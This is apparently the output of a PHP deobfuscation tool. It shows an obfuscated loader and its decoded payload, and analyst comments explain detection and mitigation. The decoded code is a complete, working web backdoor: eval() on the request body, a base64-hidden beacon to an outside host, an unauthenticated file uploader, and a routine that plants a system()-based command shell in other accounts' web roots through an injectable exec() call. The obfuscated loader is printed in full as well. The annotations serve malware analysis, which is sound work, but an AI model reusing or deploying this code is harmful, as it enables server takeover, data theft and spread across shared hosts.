PHP Decode
$O0O000="PXTSQyGCHwdZEKFOkLiaJjzoxVghuNfmMBRpelIrAcsbvntqUYWDARqXiTgvVQsKUnCzFSBxEuobNZckD..
Decoded Output download
?>b'<?php
// ANALYST NOTE (backdoor): the raw request body read from php://input is passed
// straight to eval() on every request, with no authentication check in front of it.
// Anyone who can reach this file over HTTP can therefore have the server run PHP
// source they send in the body.
// Detection: eval() fed by file_get_contents on php://input; requests carrying PHP
// source in the body to a script that normally takes no body.
eval(\'?>\'.file_get_contents(\'php://input\'));
// ANALYST NOTE (call-home beacon): the base64 literal below decodes to
// hxxps://siyahi[.]top/test/style[.]php (defanged here; treat as a network indicator).
$k3yw = base64_decode(\'aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw\');
// The URL of this infected file is rebuilt from the Host header and the request URI.
// The scheme is hard-coded to http regardless of how the request actually arrived.
$cur = \'http://\' . $_SERVER[\'HTTP_HOST\'] . $_SERVER[\'REQUEST_URI\'];
// Single form field, file_url, carrying that URL.
$data = array(\'file_url\' => $cur);
$options = array(
\'http\' => array(
\'method\' => \'POST\',
\'header\' => \'Content-type: application/x-www-form-urlencoded\',
\'content\' => http_build_query($data),
),
);
$context = stream_context_create($options);
// Outbound POST to the decoded endpoint. It is not wrapped in any condition, so it is
// issued on each request that gets this far. $result is not read anywhere in the
// visible code, so the call appears to exist only to report where the file is installed.
// Detection: egress from the PHP worker to an unfamiliar host with a form body
// containing file_url= followed by a URL on the local site.
$result = file_get_contents($k3yw, false, $context);
// ANALYST NOTE (hidden uploader): this branch runs whenever the query string contains
// a parameter named MA. The presence of the key is the only gate; no password, token
// or session is checked.
if ( isset($_GET[\'MA\']) )
{
// Discloses the php_uname() string (operating system, host name, kernel/build) to the client.
echo \'<center><b>\'.php_uname().\'<br></b><b><br><br>\'.\'\'.\'<br></b>\';
// Multipart upload form posting back to the same URL. The form name/id b4b4, the
// submit field _upl and the link text on the next lines are fixed strings that can
// serve as content signatures when scanning web roots or response bodies.
echo \'<form action="" method="post" enctype="multipart/form-data" name="b4b4" id="b4b4">\';
echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';
echo \'<a href="#">Hello Dady</a>\';
// On submit, the temporary upload is copied to the client-supplied file name, taken
// as a relative path with no extension, type or path validation. Warnings from
// copy() are suppressed with @. The same unvalidated name is echoed unescaped into
// the HTML link. Net effect: arbitrary file write relative to the working directory
// of the script, typically the web-served directory it lives in.
// Detection: multipart POSTs to a URL carrying MA in the query string, followed by
// new files appearing next to the script.
if( $_POST[\'_upl\'] == "Upload" ) {
if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Done</b><br><br><a href="./\' . $_FILES[\'file\'][\'name\'] . \'">\' . $_FILES[\'file\'][\'name\'] . \'</a>\'; }
else { echo \'<b>Not Upload File !</b><br><br>\'; }
}
// Stops here so the POST handler and HTML panel further down are not reached in MA mode.
exit;
}
// ANALYST NOTE (lateral spread): runs on any POST request that was not handled by the
// MA branch above. Four request fields are read with no validation or authentication.
if ($_SERVER[\'REQUEST_METHOD\'] === \'POST\') {
// sites: newline-separated list of names; by1 / by2: path prefix and suffix placed
// around each name; file: name of the file to create.
$sites = $_POST[\'sites\'];
$by1 = $_POST[\'by1\'];
$by2 = $_POST[\'by2\'];
$file = $_POST[\'file\'];
$directories = explode("
", $sites);
foreach ($directories as $directory) {
$directory = trim($directory);
if (!empty($directory)) {
// The base64 literal decodes to a one-line PHP stub that hands the cmd query
// parameter to system(), i.e. a minimal command-execution web shell. Files whose
// entire content is that stub are a direct indicator of this tool having run.
$shell = "PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=";
$decodedShell = base64_decode($shell);
// A shell command is assembled by string interpolation: echo the stub, redirect it to
// by1 + name + by2 + / + file. Every path component comes from the request and is
// placed into the command line without escaping. The form placeholders elsewhere in
// this file (/home/ and /public_html/) suggest the target is the web root of other
// accounts on the same shared host; that is inferred from the placeholders, not
// something the code enforces.
$command = "echo \'{$decodedShell}\' > \'{$by1}{$directory}{$by2}/{$file}\'";
exec($command);
// The path is reported back whether or not the write succeeded; the result of
// exec() is never checked.
echo $directory . "/" . $file . "<br>";
}
}
}
// Mitigation notes for defenders: the spread step depends on exec() being callable
// from PHP and on the PHP user having write access to other accounts' directories.
// Disabling process-execution functions where the application allows it, and OS-level
// per-account isolation of home directories, both remove that path. After finding this
// file, sweep every web root the PHP user could write to, not only the one it was in.
?>
<!DOCTYPE html>
<html>
<head>
<!-- Analyst note: operator-facing panel for the POST handler in the PHP section of
     this file. The field names sites, by1, by2 and file are the ones that handler
     reads from $_POST, and the placeholders show the values the operator is expected
     to supply (a home-directory prefix, a web-root suffix, a file name). The title and
     heading text and the contact line near the end are fixed strings usable as content
     signatures when hunting for copies. The e-mail address in the contact line appears
     to have been masked by the hosting page and is not recoverable from this listing. -->
<title>ByPass Server</title>
</head>
<body><center>
<h1>ByPass Server ( 2023 )</h1>
<form method="post">
<textarea name="sites" rows="5" cols="40" placeholder="Domians"></textarea>
<br>
<input type="text" name="by1" placeholder="/home/">
<br>
<input type="text" name="by2" placeholder="/public_html/">
<br>
<input type="text" name="file" placeholder="XxX.php">
<br>
<input type="submit" value="RuN">
</form>
<br>
<h2>Telegram : @public_html | Email : [email protected]</h2>
</body></center>
</html>'
Original Code
$O0O000="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";
// ANALYST NOTE (loader stub): $O0O000 is one string with three parts. Characters 0-51
// and characters 52-103 are two 52-character alphabets; everything from offset 104
// onward is the encoded payload.
// strtr() replaces each payload character found in the second alphabet with the
// character at the same position in the first alphabet. Characters not listed in the
// alphabet (digits and base64 punctuation) pass through unchanged. The result is
// ordinary base64, which base64_decode() turns into PHP/HTML source.
// eval() then executes that source; the literal prepended to it is a PHP close tag, so
// the decoded text is parsed starting in HTML mode and must open its own PHP tag.
// Static recovery: in an isolated analysis environment, replace eval with an output
// call so the decoded text is printed instead of run.
// Hunting: one long string literal sliced with substr at offsets 0, 52 and 104, then
// passed through strtr and base64_decode into eval.
eval('?>'.base64_decode(strtr(substr($O0O000 ,52*2),substr($O0O000,52,52),substr($O0O000,0,52))));
Function Calls
strtr | 1 |
substr | 3 |
base64_decode | 1 |
Stats
MD5 | 178806055b3767f3faec06704e0a17ef |
Eval Count | 1 |
Decode Time | 39 ms |